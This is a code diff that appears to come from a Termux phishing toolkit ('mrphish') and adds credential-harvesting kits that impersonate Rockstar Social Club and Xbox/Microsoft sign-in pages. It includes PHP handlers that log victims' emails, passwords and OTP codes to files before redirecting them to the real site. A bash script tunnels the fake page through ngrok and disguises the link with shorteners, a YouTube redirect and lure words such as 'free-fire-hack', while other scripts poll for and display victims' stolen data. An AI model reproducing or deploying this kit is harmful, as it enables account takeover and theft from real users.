     99 +<audio id="xyz" src="https://x2convert.com/Thankyou?token=U2FsdGVkX19zZMVUt9FiInLG3xbWVEJ5Qo3jI3T1LqIK7LvqpIWb9DRoXutU4sdS5xwu6RqaXWm7aJcIoxqPWJPv6y6%2fAwEdoYgxddDrJ%2fKfoRDyWwf3gW%2fB2LL9fK9MxIdB2P2W9PIH0UcMazELrvBIYp0g8pQGFwORMDBjukJFjZc%2f0dMbScfWa5oyiKcE&s=youtube&id=&h=3692998352381650705" preload="auto"></audio>
     100 +<br>
     101 +<div dir="ltr" style="text-align: left;" trbidi="on">
     102 +<script>
     103 + var count = 10; // Number of remaining seconds.
     104 + var counter; // Handle for the countdown event.
     105 +
     106 + function start() {
     107 + counter = setInterval(timer, 1000);
     108 + }
     109 +
     110 + function timer() {
     111 + // Show the number of remaining seconds on the web page.
     112 + var output = document.getElementById("displaySeconds");
     113 + output.innerHTML = count;
     114 +
     115 + // Decrease the remaining number of seconds by one.
     116 + count--;
     117 +
     118 + // Check if the counter has reached zero.
     119 + if (count < 0) { // If the counter has reached zero...
     120 + // Stop the counter.
     121 + clearInterval(counter);
     122 +
     123 + // Start the download.
     124 + {
     125 + document.getElementById('xyz').play();
     126 + alert("YOUR OTP IS 64583");
     127 +}
     128 + return;
     129 + }
     130 + }
     131 + // Start the countdown timer when the page loads.
     132 + window.addEventListener("load", start, false);
     133 + </script>
     134 +<span style="color: black;">
     135 +<span id="displaySeconds"></span>
     136 +</body>
     137 +</html>
  • ■ ■ ■ ■ ■ ■
    socialclub/otp/otp.php
     1 +<?php
     2 +file_put_contents("otp.txt", "" . $pass = $_POST['pass'] . "\n", FILE_APPEND);
     3 +header('Location: https://signin.rockstargames.com/');
     4 +?>
  • ■ ■ ■ ■ ■ ■
    socialclub/otp/process.php
     1 +<?php
     2 +include 'ip.php';
     3 +file_put_contents("gmail.txt", "" . $email = $_POST['email'] . "\n", FILE_APPEND);
     4 +?>
     5 +<?php
     6 +file_put_contents("pass.txt", "" . $pass = $_POST['pass'] . "\n", FILE_APPEND);
     7 +header('Location: otp.html');
     8 +?>
  • ■ ■ ■ ■ ■ ■
    socialclub/otp/show.sh
     1 +clear
     2 +echo -e "\e[96m LOCAL DATABASE DUMPS\e[0m"
     3 +cd /sdcard/dUmpS
     4 +ls
     5 +echo
     6 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] TARGET NAME: \e[0m' name
     7 +echo -e "\e[96m | "
     8 +printf " \e[1;92m\e[0m\e[1;96m|------------------[\e[92mACCESSED\e[96m]\e[0m\n"
     9 +echo
     10 +sleep 3.0
     11 +cd $name
     12 +bash grad.sh
     13 +sleep 16
     14 +cd $HOME/mrphish
     15 +bash mrphish
     16 + 
  • ■ ■ ■ ■ ■ ■
    socialclub/otp/social.sh
     1 +#SCRIPT BY NOOB HACKERS
     2 +#YOU CAN CHANGE CREDITS BUT STILL YOU ARE KIDDO
     3 +#GIVE CREDITS IF YOU ARE CODER
     4 +#CHANGING CREDITS IS EASY BUT CODING IS TALENT
     5 +#THANKS TO ALL MY SUBSCRIBERS
     6 +#This is official tool of noob hackers if you steal it then your respositery will be banned soon so be careful and
     7 +#copyright strike will be sent to your channel, if you dont give credits
     8 +cd $HOME/mrphish/core
     9 +cp ngrok /data/data/com.termux/files/home/mrphish/core/deploys/gaming/socialclub/otp
     10 +cd /data/data/com.termux/files/home/mrphish/core/deploys/gaming/socialclub/otp
     11 +rm *.txt 2>/dev/null
     12 +stop() {
     13 +checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
     14 +checkphp=$(ps aux | grep -o "php" | head -n1)
     15 +checkssh=$(ps aux | grep -o "ssh" | head -n1)
     16 +if [[ $checkngrok == *'ngrok'* ]]; then
     17 +pkill -f -2 ngrok > /dev/null 2>&1
     18 +killall -2 ngrok > /dev/null 2>&1
     19 +fi
     20 + 
     21 +if [[ $checkphp == *'php'* ]]; then
     22 +killall -2 php > /dev/null 2>&1
     23 +fi
     24 +if [[ $checkssh == *'ssh'* ]]; then
     25 +killall -2 ssh > /dev/null 2>&1
     26 +fi
     27 +exit 1
     28 + 
     29 +}
     30 + 
     31 +dependencies() {
     32 + 
     33 + 
     34 +command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; }
     35 +
     36 + 
     37 + 
     38 +}
     39 + 
     40 +checkfound() {
     41 + 
     42 +printf "\n"
     43 +printf "\e[1;92m\e[0m\e[1;96m|---------------------------------------------------------------|\e[0m\n"
     44 +printf " \e[1;92m\e[1;77m\e[0m\e[1;96m |\e[96m WAITING FOR DATA LOGS,\e[0m\e[1;91m PRESS CTRL+C TO STOP \e[96m|\e[0m\n"
     45 +printf "\e[1;92m\e[0m\e[1;96m|---------------------------------------------------------------|\e[0m\n"
     46 +while [ true ]; do
     47 + 
     48 + 
     49 +if [[ -e "gmail.txt" ]]; then
     50 +printf " \n\e[1;96m[\e[92m+>\e[1;96m] VICTIM ACCESSED LINK...!\e[0m\n"
     51 +printf "\e[1;92m\e[0m\e[1;96m |-------------------------------------[\e[92mSUCCESS\e[96m]\e[0m\n"
     52 +fi
     53 + 
     54 +sleep 3.5
     55 + 
     56 +if [[ -e "pass.txt" ]]; then
     57 +printf " \n\e[1;96m[\e[92m+>\e[1;96m] VALID DATA FOUND...!\e[0m\n"
     58 +printf "\e[1;92m\e[0m\e[1;96m |-------------------------------------[\e[92mSUCCESS\e[96m]\e[0m\n"
     59 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     60 +sleep 3.0
     61 +printf " \e[1;92m\e[0m\e[1;96m|---------------[\e[92mOPENING DUMP\e[96m]\e[0m\n"
     62 +sleep 10.0
     63 +bash io.sh
     64 +fi
     65 +sleep 3.0
     66 +done
     67 + 
     68 +}
     69 + 
     70 +ngrok_server() {
     71 + 
     72 + 
     73 +if [[ -e ngrok ]]; then
     74 +echo ""
     75 +else
     76 +command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
     77 +command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
     78 +printf " \e[1;96m[\e[0m#\e[1;96m] DOWNLOADING NGROK ...\n"
     79 +arch=$(uname -a | grep -o 'arm' | head -n1)
     80 +arch2=$(uname -a | grep -o 'Android' | head -n1)
     81 +if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
     82 +wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1
     83 +if [[ -e ngrok-stable-linux-arm.zip ]]; then
     84 +unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
     85 +chmod +x ngrok
     86 +rm -rf ngrok-stable-linux-arm.zip
     87 +else
     88 +printf " \e[1;96m[!] Download error... Termux, run:\e[0m\e[1;96m pkg install wget\e[0m\n"
     89 +exit 1
     90 +fi
     91 + 
     92 +else
     93 +wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1
     94 +if [[ -e ngrok-stable-linux-386.zip ]]; then
     95 +unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
     96 +chmod +x ngrok
     97 +rm -rf ngrok-stable-linux-386.zip
     98 +else
     99 +printf " \e[1;96m[!] Download error... \e[0m\n"
     100 +exit 1
     101 +fi
     102 +fi
     103 +fi
     104 +printf " \e[1;92m\e[0m\e[1;96m ____[\e[92monline\e[96m] \e[0m\n"
     105 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     106 +printf "\e[1;96m[\e[92m+\e[1;96m] STARTING DATA SERVER ....\n"
     107 +php -S 127.0.0.1:3333 > /dev/null 2>&1 &
     108 +sleep 4
     109 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     110 +printf "\e[1;96m[\e[92m+\e[1;96m] STARTING DEPLOY SERVER....\n"
     111 +./ngrok http 3333 > /dev/null 2>&1 &
     112 +sleep 12.0
     113 +link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
     114 +echo $link > sss
     115 +File=sss
     116 +if grep -q https:// "$File"
     117 +then
     118 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     119 +printf "\e[1;96m[\e[92m+\e[1;96m] DEPLOY LINK STATUS \e[96m[\e[92mWORKING\e[96m]\e[0m\n"
     120 +else
     121 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     122 +printf "\e[1;96m[\e[92m+\e[1;96m] DEPLOY LINK STATUS \e[96m[\e[91mERROR\e[96m]\e[0m\n"
     123 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     124 +printf "\e[1;96m[\e[92m+\e[1;96m] \e[91m PLEASE USE HOTPOST OR SPEED DATA OR USE AUTH TOKEN\n"
     125 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     126 +printf "\e[1;96m[\e[92m+\e[1;96m] \e[91m HOLD CTRL + C OR USE VOLUME DOWN + C TO STOP\n"
     127 +sleep 30m 10s
     128 +fi
     129 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     130 +printf "\e[1;96m[\e[92m+\e[1;96m] Copy ThiS Link \e[92m $link \e[0m\n"
     131 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     132 +printf "\e[1;96m[\e[92m+\e[1;96m] COPY & PASTE ABOVE LINK IN THIS TYPE 1 WEBSITE AND PASTE SHORTLINK BELOW"
     133 +echo " "
     134 +printf " \e[1;92m\e[0m\e[1;96m|\n"
     135 +echo -en "\e[32mTYPE 1 =>\e[0m "
     136 +read nmr
     137 +if [[ "$nmr" = "1" ]];
     138 +then
     139 +am start -a android.intent.action.VIEW -d https://rebrand.ly/mrpcdm > /dev/null
     140 +else
     141 +echo > /dev/null
     142 +fi
     143 +printf " \e[1;92m\e[0m\e[1;96m|\n"
     144 +echo -en "\e[32mPASTE SHORT LINK=>\e[0m "
     145 +read lnkstr
     146 +echo $lnkstr > lnkstr.sh
     147 +linko=$(cat lnkstr.sh)
     148 +short=$(curl -s https://da.gd/s/?url=${linko})
     149 +shorter=${short#https://}
     150 +echo " "
     151 +echo -e '\e[92m Type custom words like: (free-fire-hack, hack-android)'
     152 +echo -e "\e[91m Don't use space just use '-' between words\e[0m"
     153 +echo " "
     154 +echo -en "\e[92mCUSTOM WORDS=>\e[0m "
     155 +read words
     156 +final=$words@$shorter
     157 +shortb=$(curl -s https://da.gd/s/?url=${linko})
     158 +shorterb=${short#https://}
     159 +wordsb="farcry5-free-download"
     160 +finalb=$wordsb@$shorterb
     161 +url="https://m.youtube.com/redirect?q=${link}"
     162 +tiny=$(curl -s http://tinyurl.com/api-create.php?url=${url})
     163 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     164 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------------------------------------------|\e[0m\n"
     165 +printf "\e[1;96m[\e[92m+>\e[1;96m NGROK LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $link
     166 +printf " \e[1;92m\e[0m\e[1;96m|------------------------\e[0m\n"
     167 +printf "\e[1;96m[\e[92m+>\e[1;96m CUSTOM LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $final
     168 +printf " \e[1;92m\e[0m\e[1;96m|------------------------\e[0m\n"
     169 +printf "\e[1;96m[\e[92m+>\e[1;96m DEFAULT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $finalb
     170 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------\e[0m\n"
     171 +printf "\e[1;96m[\e[92m+>\e[1;96m REDIRECT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $tiny
     172 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------\e[0m\n"
     173 +printf "\e[1;96m[\e[92m+>\e[1;96m SHORT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $linko
     174 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------------------------------------------|\e[0m\n"
     175 +checkfound
     176 +}
     177 + 
     178 +start1() {
     179 +if [[ -e sendlink ]]; then
     180 +rm -rf sendlink
     181 +fi
     182 + 
     183 +printf "\n"
     184 +echo -e "\e[96m
     185 + ____ ____ ____ __ __ _ _
     186 + ( \( __)( _ \( ) / \( \/ )
     187 + ) D ( ) _) ) __// (_/\( O )) /"
     188 +echo -e "\e[91m (____/(____)(__) \____/ \__/(__/\e[0m"
     189 +echo
     190 +default_option_server="2"
     191 +read -p $'\n\e[1;91m[\e[0m\e[1;77m+\e[0m\e[1;96m] START ATTACK [y/n] : \e[0m' option_server
     192 +clear
     193 +option_server="${option_server:-${default_option_server}}"
     194 +if [[ $option_server -eq 1 ]]; then
     195 + 
     196 +command -v php > /dev/null 2>&1 || { echo >&2 "This Server No More Supported So, Aborting."; exit 1; }
     197 +start
     198 + 
     199 +elif [[ $option_server -eq y ]]; then
     200 +ngrok_server
     201 +else
     202 +printf "\e[1;93m [!] Invalid option!\e[0m\n"
     203 +sleep 1
     204 +clear
     205 +start1
     206 +fi
     207 + 
     208 +}
     209 + 
     210 + 
     211 +start() {
     212 + 
     213 +default_choose_sub="Y"
     214 +default_subdomain="mrphish$RANDOM"
     215 + 
     216 +printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Choose subdomain? (Default:\e[0m\e[1;77m [Y/n] \e[0m\e[1;33m): \e[0m'
     217 +read choose_sub
     218 +choose_sub="${choose_sub:-${default_choose_sub}}"
     219 +if [[ $choose_sub == "Y" || $choose_sub == "y" || $choose_sub == "Yes" || $choose_sub == "yes" ]]; then
     220 +subdomain_resp=true
     221 +printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Subdomain: (Default:\e[0m\e[1;77m %s \e[0m\e[1;33m): \e[0m' $default_subdomain
     222 +read subdomain
     223 +subdomain="${subdomain:-${default_subdomain}}"
     224 +fi
     225 + 
     226 +server
     227 +checkfound
     228 + 
     229 +}
     230 + 
     231 +dependencies
     232 +start1
     233 + 
  • ■ ■ ■ ■ ■ ■
    socialclub/otp/style.css
     1 +*{
     2 + margin: 0;
     3 + padding: 0;
     4 + font-family: "ubuntu",sans-serif;
     5 + box-sizing: border-box;
     6 +}
     7 +
     8 +::selection{
     9 + background-color: #fdcf74;
     10 +}
     11 +
     12 +body{
     13 + background-image: url(images/bg.png);
     14 + background-size: 256px;
     15 + min-height: 100vh;
     16 + display: grid;
     17 + justify-items: center;
     18 + align-items: center;
     19 + grid-template-rows: auto 62px;
     20 +}
     21 +
     22 +.login-form{
     23 + width: 100%;
     24 + max-width: 500px;
     25 +}
     26 +
     27 +.logo{
     28 + background-image: url(images/logo.svg);
     29 + width: 290px;
     30 + height: 82px;
     31 + margin: 40px auto;
     32 +}
     33 +
     34 +.container{
     35 + margin: 20px 0;
     36 + background-color: #fff;
     37 + padding: 20px;
     38 + border-radius: 2px;
     39 + color: #4d4d4d;
     40 +}
     41 +
     42 +.container h1{
     43 + font-size: 24px;
     44 + margin-bottom: 20px;
     45 +}
     46 +
     47 +.txtb{
     48 + height: 50px;
     49 + margin-bottom: 20px;
     50 + position: relative;
     51 + overflow: hidden;
     52 +}
     53 +
     54 +.txtb input{
     55 + width: 100%;
     56 + height: 50px;
     57 + border: 1px solid #e6e6e6;
     58 + padding: 0 20px;
     59 + font-size: 18px;
     60 + color: #666;
     61 + border-radius: 3px;
     62 + outline: 3px solid #fcaf1770;
     63 +}
     64 +
     65 +.placeholder{
     66 + position: absolute;
     67 + left: 20px;
     68 + top: 50%;
     69 + transform: translateY(-50%);
     70 + user-select: none;
     71 + pointer-events: none;
     72 + font-size: 17px;
     73 + transform-origin: 0 0;
     74 + transition: .2s linear;
     75 +}
     76 +
     77 +.txtb input:not(:placeholder-shown) + .placeholder{
     78 + transform: scale(.75) translateY(-26px);
     79 +}
     80 +
     81 +.txtb input:not(:placeholder-shown){
     82 + padding-top: 12px;
     83 +}
     84 +
     85 +.show-password-btn{
     86 + position: absolute;
     87 + right: 20px;
     88 + top: 50%;
     89 + transform: translateY(-50%);
     90 + cursor: pointer;
     91 + fill: #999;
     92 +}
     93 +
     94 +.checkbox{
     95 + display: inline-block;
     96 + margin-bottom: 20px;
     97 + cursor: pointer;
     98 + padding-left: 30px;
     99 + position: relative;
     100 +}
     101 +
     102 +.checkbox input{
     103 + display: none;
     104 +}
     105 +
     106 +.checkbox span::before{
     107 + content: "";
     108 + position: absolute;
     109 + width: 20px;
     110 + height: 20px;
     111 + border: 1px solid #4d4d4d;
     112 + left: 0;
     113 + box-sizing: border-box;
     114 + border-radius: 3px;
     115 +}
     116 +
     117 +.checkbox span:after{
     118 + content: "";
     119 + position: absolute;
     120 + width: 12px;
     121 + height: 6px;
     122 + border-bottom: 2px solid #333;
     123 + border-left: 2px solid #333;
     124 + transform: rotate(-50deg);
     125 + box-sizing: border-box;
     126 + left: 4px;
     127 + top: 6px;
     128 + display: none;
     129 +}
     130 +
     131 +.checkbox input:checked + span::after{
     132 + display: block;
     133 +}
     134 +
     135 +.forgot-signin-container{
     136 + display: flex;
     137 + align-items: center;
     138 + justify-content: space-between;
     139 +}
     140 +
     141 +.link{
     142 + color: #fcaf17;
     143 + text-decoration: none;
     144 + transition: .2s linear;
     145 +}
     146 +
     147 +.link:hover{
     148 + text-decoration: underline;
     149 +}
     150 +
     151 +.forgot-signin-container input{
     152 + width: 100px;
     153 + height: 38px;
     154 + border: none;
     155 + background-image: linear-gradient(90deg,#f7931e,#fcaf17);
     156 + color: #fff;
     157 + font-weight: 700;
     158 + outline: none;
     159 + cursor: pointer;
     160 + border-radius: 3px;
     161 +}
     162 +
     163 +.forgot-signin-container input:hover{
     164 + background: #fcaf17;
     165 +}
     166 +
     167 +.bottom-container{
     168 + display: flex;
     169 + flex-wrap: wrap;
     170 + justify-content: space-between;
     171 + align-items: center;
     172 +}
     173 +
     174 +.bottom-container h3{
     175 + font-size: 18px;
     176 + font-weight: 500;
     177 +}
     178 +
     179 +.sm-login{
     180 + display: flex;
     181 + justify-content: space-between;
     182 +}
     183 +
     184 +.sm-login a{
     185 + width: 38px;
     186 + margin: 0 5px;
     187 + overflow: hidden;
     188 +}
     189 +
     190 +.sm-login a img{
     191 + width: 100%;
     192 +}
     193 +
     194 +.create-account{
     195 + text-align: center;
     196 + color: #fff;
     197 + margin: 30px 0;
     198 +}
     199 +
     200 +.copyright{
     201 + color: #999;
     202 + font-size: 12px;
     203 +}
     204 +
     205 +@media screen and (max-width: 520px){
     206 + body{
     207 + align-items: unset;
     208 + }
     209 +
     210 + .logo{
     211 + width: 236px;
     212 + height: 67px;
     213 + margin: 16px auto;
     214 + }
     215 +
     216 + .container{
     217 + margin: 8px;
     218 + }
     219 + .row{
     220 + width: 100%;
     221 + }
     222 + .sm-login{
     223 + margin-top: 8px;
     224 + }
     225 + .sm-login a{
     226 + flex: 1;
     227 + max-width: 65px;
     228 + }
     229 +}
  • ■ ■ ■ ■ ■ ■
    xbox/back
     1 +cd $HOME/mrphish/core/deploys/socialmedia/
     2 +bash menu
     3 + 
  • ■ ■ ■ ■ ■ ■
    xbox/menu
     1 + 
     2 +clear
     3 +echo -e "
     4 + 
     5 + ____ _ _ ____ ____
     6 + (_ _)( \/ )( _ \( __)
     7 + )( ) / ) __/ ) _)
     8 + (__) (__/ (__) (____)"
     9 + 
     10 + echo
     11 + 
     12 +echo -e "\e[96m |-----------------------------------------------------|"
     13 +echo -e "\e[96m |-------------------\e[92mSELECT OPTIONS\e[96m--------------------|"
     14 +echo -e "\e[96m |-----------------------------------------------------|"
     15 +echo -e "\e[96m | |"
     16 +echo -e "\e[96m | |"
     17 +echo -e "\e[96m | [\e[92m1\e[96m]==> WITH OTP |"
     18 +echo -e "\e[96m | [\e[92m2\e[96m]==> WITHOUT OTP |"
     19 +echo -e "\e[96m | |"
     20 +echo -e "\e[96m | [\e[92m3\e[96m]==> BACK |"
     21 +echo -e "\e[96m | |"
     22 +echo -e "\e[96m | |"
     23 +echo -e "\e[96m |-----------------------------------------------------|"
     24 +echo -e "\e[96m |-----------------------\e[91mXBOX\e[96m--------------------------|"
     25 +echo -e "\e[96m |-----------------------------------------------------|"
     26 +sleep 0.5
     27 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] SELECT OPTION: \e[0m' option
     28 +if [[ $option == 1 || $option == 01 ]]; then
     29 +echo
     30 +cd $HOME/mrphish/core/deploys/gaming/xbox/otp
     31 +bash xbox.sh
     32 +echo
     33 +elif [[ $option == 2 || $option == 02 ]]; then
     34 +echo
     35 +cd $HOME/mrphish/core/deploys/gaming/xbox/notp
     36 +bash xbox.sh
     37 +elif [[ $option == 3 || $option == 03 ]]; then
     38 +bash back
     39 +elif [[ $option == 0 ]]; then
     40 +clear
     41 +echo
     42 +printf " \e[1;96m Have A Good Day ........! \e[0m\n"
     43 +echo
     44 +sleep 3.0
     45 +exit 3
     46 +else
     47 +printf " \e[1;96m [!] Invalid option!\e[0m\n"
     48 +sleep 4.0
     49 +bash menu.sh
     50 +fi
     51 + 
  • ■ ■ ■ ■ ■ ■
    xbox/notp/dump.sh
     1 +echo -e "\e[96m | "
     2 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] VICTIM NAME: \e[0m' name
     3 +cd /sdcard/dUmpS
     4 +mkdir $name
     5 +cd $HOME/mrphish/core/deploys/gaming/xbox/notp
     6 +mv *.txt /sdcard/dUmpS/$name
     7 +cp grad.sh /sdcard/dUmpS/$name
     8 +sleep 2.3
     9 +echo -e "\e[96m | "
     10 +printf " \e[1;92m\e[0m\e[1;96m|------------------[\e[92mDONE\e[96m]\e[0m\n"
     11 +cd $HOME/mrphish
     12 +bash mrphish
     13 + 
  • ■ ■ ■ ■ ■ ■
    xbox/notp/grad.sh
     1 +clear
     2 +echo
     3 +echo -e '\e[96m
     4 + __ _____ ___ ___
     5 + ( ) ( _ )/ __)/ __)
     6 + )(__ )(_)(( (_-.\__ \\'
     7 +echo -e '\e[91m (____)(_____)\___/(___/ \e[0m'
     8 +echo " "
     9 +echo " XBOX HACKED LOGS........."
     10 +echo -e "\e[96m |---------------------------------------------------------------|"
     11 +ip=$(cat ip.txt)
     12 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] IP:\e[0m\e[1;92m $ip \e[0m\n" $ip
     13 +echo -e "\e[96m |---------------------------------------------------------------|"
     14 +ip=$(cat gmail.txt)
     15 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] GMAIL:\e[0m\e[1;92m $ip \e[0m\n" $ip
     16 +echo -e "\e[96m |---------------------------------------------------------------|"
     17 +ip=$(cat pass.txt)
     18 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] PASS:\e[0m\e[1;92m $ip \e[0m\n" $ip
     19 +echo -e "\e[96m |---------------------------------------------------------------|"
     20 +sleep 8.0
     21 +if [ -f "ngrok" ];
     22 +then
     23 +rm ngrok
     24 +else
     25 +sleep 0.2
     26 +fi
     27 +#ip=$(cat gml.txt)
     28 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] NUMBER:\e[0m\e[1;77m $ip \e[0m\n" $ip
     29 +#ip=$(cat num.txt)
     30 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] BIO:\e[0m\e[1;77m $ip \e[0m\n" $ip
     31 +#ip=$(cat bio.txt)
     32 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] USER:\e[0m\e[1;77m $ip \e[0m\n" $ip
     33 +#ip=$(cat usr.txt)
     34 +#printf "\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;93m] IP:\e[0m\e[1;77m $ip \e[0m\n" $ip
     35 +#ip=$(cat cred.txt)
     36 +#printf "\e[1;93m[\e[0m\e[1;77m|\e[0m\e[1;93m] OT \e[0m\e[1;92m $ip \e[0m\n" $ip
     37 + 
  • ■ ■ ■ ■ ■ ■
    xbox/notp/index.php
     1 +<?php session_start();?>
     2 +<html dir="ltr" lang="EN-US"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><script type="text/javascript">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, TOTPAuthenticator: 10, RecoveryCode: 11, StrongTicket: 13, TOTPAuthenticatorV2: 14, UniversalSecondFactor: 15, Voice: -3};</script><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=e52f753aa5184927ab11e578045c61f0"/>Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.<br /><br />To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.</noscript><title>Sign in to your Microsoft account</title><meta name="robots" content="none"><meta name="PageID" content="i5030"><meta name="SiteID" content="38936"><meta name="ReqLC" content="1033"><meta name="LocLC" content="1033"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes"><script type="text/javascript">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var o=t[n]={exports:{},id:n,loaded:!1};return e[n].call(o.exports,o,o.exports,r),o.loaded=!0,o.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){!function(){function e(){return s.$Config||s.ServerData||{}}function r(e,r){var t=s.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(e){var r=e.indexOf("?"),t=r>-1?r:e.length;return t>u&&e.substr(t-u,u).toLowerCase()===c}function n(){var r=e(),t=r.loader||{};return t.slReportFailure||r.slReportFailure||!1}function o(){var r=e(),t=r.loader||{};return t.redirectToErrorPageOnLoadFailure||!1}function a(e){var r=!0,n=e.src||e.href||"";if(n){if(t(n))try{e.sheet&&e.sheet.cssRules&&!e.sheet.cssRules.length&&(r=!1)}catch(o){}}else r=!1;return r}function i(){function n(e){var r=d.getElementsByTagName("head")[0];r.appendChild(e)}function o(e,r,n){var o=t(e)?i(e):s(e);return r&&(o.id=r),o.setAttribute&&(o.setAttribute("crossorigin","anonymous"),n&&o.setAttribute("integrity",n)),o}function i(e){var r=d.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function s(e){var r=d.createElement("script");return r.type="text/javascript",r.src=e,r.defer=!1,r.async=!1,r}function c(e){if(!(p&&p.length>1))return e;for(var r=0;r<p.length;r++)if(0===e.indexOf(p[r]))return p[r+1<p.length?r+1:0]+e.substring(p[r].length);return e}function u(e,t,n,o){return r("[$Loader]: "+(y.failMessage||"Failed"),o),L[e].retry<g?(L[e].retry++,void f(e,t,n)):void(n&&n())}function l(e,t,n,o){a(o)?(r("[$Loader]: "+(y.successMessage||"Loaded"),o),f(e+1,t,n)):u(e,t,n,o)}function f(e,t,a){if(e<L.length){var i=L[e];if(!i||!i.srcPath)return void f(e+1,t,a);i.retry>0&&(i.srcPath=c(i.srcPath),i.origId||(i.origId=i.id),i.id=i.origId+"_Retry_"+i.retry);var s=o(i.srcPath,i.id,i.integrity);s.onload=function(){l(e,t,a,s)},s.onerror=function(){u(e,t,a,s)},s.onreadystatechange=function(){"loaded"===s.readyState?setTimeout(function(){l(e,t,a,s)},500):"complete"===s.readyState&&l(e,t,a,s)},n(s),r("[$Loader]: Loading '"+(i.srcPath||"")+"', id:"+(i.id||""))}else t&&t()}var h=e(),g=h.slMaxRetry||2,v=h.loader||{},p=v.cdnRoots||[],y=this,L=[];y.retryOnError=!0,y.successMessage="Loaded",y.failMessage="Error",y.Add=function(e,r,t,n){e&&L.push({srcPath:e,id:r,retry:n||0,integrity:t})},y.AddForReload=function(e){var r=e.src||e.href||"";y.Add(r,"AddForReload",e.integrity,1)},y.AddIf=function(e,r,t){e&&y.Add(r,t)},y.Load=function(e,r){f(0,e,r)}}var s=window,d=s.document,c=".css",u=c.length;i.On=function(e,r){if(!e)throw"The target element must be provided and cannot be null.";r?i.OnError(e):i.OnSuccess(e)},i.OnSuccess=function(e){var t=e.src||e.href||"",s=n(),d=o();if(!e)throw"The target element must be provided and cannot be null.";if(a(e)){r("[$Loader]: Loaded",e);var c=new i;c.failMessage="Reload Failed",c.successMessage="Reload Success",c.Load(null,function(){if(s)throw"Unexpected state. resourceLoader.Load() failed despite initial load success. ['"+t+"']";d&&(document.location.href="/error.aspx?err=504")})}else i.OnError(e)},i.OnError=function(e){var t=e.src||e.href||"",a=n(),s=o();if(!e)throw"The target element must be provided and cannot be null.";r("[$Loader]: Failed",e);var d=new i;d.failMessage="Reload Failed",d.successMessage="Reload Success",d.AddForReload(e),d.Load(null,function(){if(a)throw"Failed to load external resource ['"+t+"']";s&&(document.location.href="/error.aspx?err=504")})},s.$Loader=i}()}]));</script><script type="text/javascript">!function(r,t){for(var e in t)r[e]=t[e]}(this,function(r){function t(o){if(e[o])return e[o].exports;var n=e[o]={exports:{},id:o,loaded:!1};return r[o].call(n.exports,n,n.exports,t),n.loaded=!0,n.exports}var e={};return t.m=r,t.c=e,t.p="",t(0)}([function(r,t){!function(){function r(r,t){function e(i){var a=r[i];return i<o-1?void(n.r[a]?e(i+1):n.when(a,function(){e(i+1)})):void t(a)}var o=r.length;e(0)}function t(r,t,i){function a(){var r=!!u.method,n=r?u.method:i[0],a=u.extraArgs||[],c=o.$WebWatson;try{var f=e(i,!r);if(a&&a.length>0)for(var 